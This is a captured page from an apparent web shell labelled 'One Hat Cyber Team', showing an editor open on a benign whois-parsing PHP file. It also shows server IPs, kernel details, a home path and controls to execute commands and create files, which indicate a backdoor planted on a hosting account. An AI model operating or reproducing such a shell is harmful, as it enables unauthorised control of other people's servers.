⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.88
Server IP:
186.226.58.36
Server:
Linux da02.sh15.net 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Server Software:
Apache/2
PHP Version:
8.1.32
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
redesystem
/
public_html
/
dist
/
libs
/
whois
/
src
/
Edit File: whois.zanet.php
'Domain Name : ', 'domain.created' => 'Record Created :', 'domain.changed' => 'Record Last Updated :', 'owner.name' => 'Registered for :', 'admin' => 'Administrative Contact :', 'tech' => 'Technical Contact :', 'domain.nserver' => 'Domain Name Servers listed in order:', 'registered' => 'No such domain: ', '' => 'The ZA NiC whois' ); // Arrange contacts ... $rawdata = array(); foreach ($data_str['rawdata'] as $key => $line) { if (strpos($line, ' Contact ') !== false) { $pos = strpos($line, ':'); if ($pos !== false) { $rawdata[] = substr($line, 0, $pos + 1); $rawdata[] = trim(substr($line, $pos + 1)); continue; } } $rawdata[] = $line; } $r['regrinfo'] = get_blocks($rawdata, $items); if (isset($r['regrinfo']['registered'])) { $r['regrinfo']['registered'] = 'no'; } else { if (isset($r['regrinfo']['admin'])) $r['regrinfo']['admin'] = get_contact($r['regrinfo']['admin']); if (isset($r['regrinfo']['tech'])) $r['regrinfo']['tech'] = get_contact($r['regrinfo']['tech']); } $r['regyinfo']['referrer'] = 'http://www.za.net/'; // or http://www.za.org $r['regyinfo']['registrar'] = 'ZA NiC'; format_dates($r, 'xmdxxy'); return $r; } }
Simpan